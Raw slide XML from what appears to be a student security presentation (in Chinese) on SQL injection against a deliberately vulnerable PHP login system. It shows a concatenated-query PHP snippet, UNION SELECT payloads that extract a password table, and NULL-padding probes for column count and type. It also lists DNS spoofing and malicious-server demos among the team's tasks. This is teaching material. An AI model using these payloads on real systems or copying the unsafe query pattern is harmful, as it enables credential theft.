                  <a:srgbClr val="333333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10A24E-CF1F-AEFE-F1A6-D5AB0D347D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452884" y="1920633"/>
            <a:ext cx="2626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i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>組成員表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike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en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>GroupB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333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0D70AB2-1DD7-AD87-69A0-2AB8C06CBECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757742" y="4203342"/>
            <a:ext cx="3151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TW" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>組所有的名字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>GroupA</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW">
              <a:effectLst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18158AA-945A-262A-6056-C547FD63B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355756"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="757742" y="4953526"/>
          <a:ext cx="3151154" cy="1165860"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3151154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2848546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Name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691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李昱佑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21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商東俊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104381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169120-4C71-3838-8B18-00C17FDAAC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4520423" y="4203342"/>
            <a:ext cx="3151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TW" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>組的名字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>GroupB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> 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596A2C5-F7E2-29E6-6632-16C565E8A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46140"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4520422" y="4953526"/>
          <a:ext cx="3151154" cy="777240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3151154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4193293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Name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87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林佳笙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674040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79BBDBB9-2CF3-6D09-BCA3-FD0A2C741290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8283104" y="3753197"/>
            <a:ext cx="3151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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>所有的名字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>GroupA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>GroupA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:effectLst/>
              </a:rPr>
              <a:t>;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7AD5E15-55B6-E22C-1AF1-CE582DCD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18079"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8283103" y="4953526"/>
          <a:ext cx="3151153" cy="1554480"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3151153">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1554761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Name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3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李昱佑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290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商東俊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14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林佳笙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18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557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6662F9-BE74-0953-3077-A3E35AC1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如何攻擊？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C70CFC0C-3EBE-2520-D8E0-11AF0E3B5757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965048" y="1920633"/>
            <a:ext cx="6261904" cy="17212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D803F90-68CE-1D5A-D934-A60ADF464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693433"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3147402" y="2296610"/>
          <a:ext cx="2626006" cy="1165860"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1313003">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1268439129"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1313003">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="31858747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ID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Name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801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李昱佑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74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effectLst/>
                        </a:rPr>
                        <a:t>商東俊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7784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71B501B6-B318-A29A-224D-7B2B17E9E67C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3147402" y="1920633"/>
            <a:ext cx="2626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i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>GroupA</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system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673149F-A245-021A-A251-4779EE286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52579"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6418594" y="2296610"/>
          <a:ext cx="2626006" cy="1165860"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1313003">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4219717180"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1313003">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="23237656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ID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passwd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7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uu1234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02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jim1234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84456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ED57BE11-58A3-295B-E3D8-95DBB71F6B52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418593" y="1909301"/>
            <a:ext cx="2626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err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>User_Passwd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="-apple-system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7DCE68-9B2C-D73F-18CB-90F70E4BBE02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709911" y="3544219"/>
            <a:ext cx="107721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 u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>危險的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>寫法：</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2400" b="1" i="0" u="none" strike="noStrike">
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“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Name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2400" b="0" i="0" u="none" strike="noStrike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GroupA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ID = ‘”.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike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userID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.”’</a:t>
            </a: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;”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="240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66F7AE-E746-A86A-F213-2CA123199162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709911" y="4791668"/>
            <a:ext cx="6547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1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2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注入點輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="24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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>‘ UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> * passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>User_Passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>;-- 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E8E7C97-8D9C-4F9C-6B90-522171458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15207"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9226952" y="4525687"/>
          <a:ext cx="1958532" cy="11658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958532">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1008047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Name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707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chemeClr val="bg2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>uu1234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314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chemeClr val="bg2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>jim1234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5023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4F754D-4204-A34A-3AD5-FDE0219DF903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9741186" y="5728232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accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" alt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75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66210-16A3-66E5-BF31-9DC81F79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攻擊流程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C8297AA-5999-5436-367C-71EBDCA5D4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="2139232"/>
            <a:ext cx="11047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latinLnBrk="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>猜測欄位數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>言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 MYSQL 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中可以使用</a:t>
            </a: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NULL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由於每一個</a:t>
            </a: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data type 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的內容都可以是</a:t>
            </a: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NULL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en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，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因此可視為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NULL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在跟其他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data type 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比較時會自動轉型成該資料的</a:t>
            </a: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 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方法</a:t>
            </a:r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:</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike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’ UNION SELECT NULL</a:t>
            </a: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-- </a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike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’ UNION SELECT NULL,NULL</a:t>
            </a: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-- </a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>’ UNION SELECT NULL,NULL,NULL-- </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412020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4B5C9-76A8-FEEF-F14B-697C39DD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組員分工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D9C9EAD-798E-8CBD-2130-5EB0B880E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094649"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="581191" y="3181865"/>
          <a:ext cx="1102961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539">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3796406903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1243869746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829834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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1092950</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>林佳笙 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400">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1093332</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>商東峻</a:t>
                      </a:r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400">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1094841</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>李昱佑</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW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681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en-US" altLang="zh-TW" sz="2400"/>
                        <a:t>DNS Spoofing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400"/>
                        <a:t> 整理</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400"/>
                    </a:p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zh-TW" altLang="en-US" sz="2400"/>
                        <a:t>攻擊</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400"/>
                        <a:t>DEMO</a:t>
                      </a:r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zh-TW" altLang="en-US" sz="2400"/>
                        <a:t>網站漏洞整理</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400"/>
                    </a:p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zh-TW" altLang="en-US" sz="2400"/>
                        <a:t>惡意伺服器架設</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400"/>
                    </a:p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zh-TW" altLang="en-US" sz="2400"/>
                        <a:t>攻擊</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400"/>
                        <a:t>DEMO</a:t>
                      </a:r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zh-TW" altLang="en-US" sz="2400" dirty="0"/>
                        <a:t>弱點系統撰寫</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
                    </a:p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zh-TW" altLang="en-US" sz="2400" dirty="0"/>
                        <a:t>弱點伺服器架設</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
                    </a:p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zh-TW" altLang="en-US" sz="2400" dirty="0"/>
                        <a:t>攻擊</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
                        <a:t>DEMO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650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817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D57A3A-3203-FEB5-D712-05AE8A59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攻擊流程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7D538BC-DCBA-7BB1-ECCA-571F6C36E938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="2554730"/>
            <a:ext cx="110479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342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>如何確定欄位的型別</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a: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UNION SELECT ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>a’,NULL,NULL,NULL</a:t>
            </a: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–</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>NULL,‘a’,NULL,NULL</a:t>
            </a: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–</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>NULL,NULL,‘a’,NULL</a:t>
            </a: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–</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>NULL,NULL,NULL,‘a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>’–</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
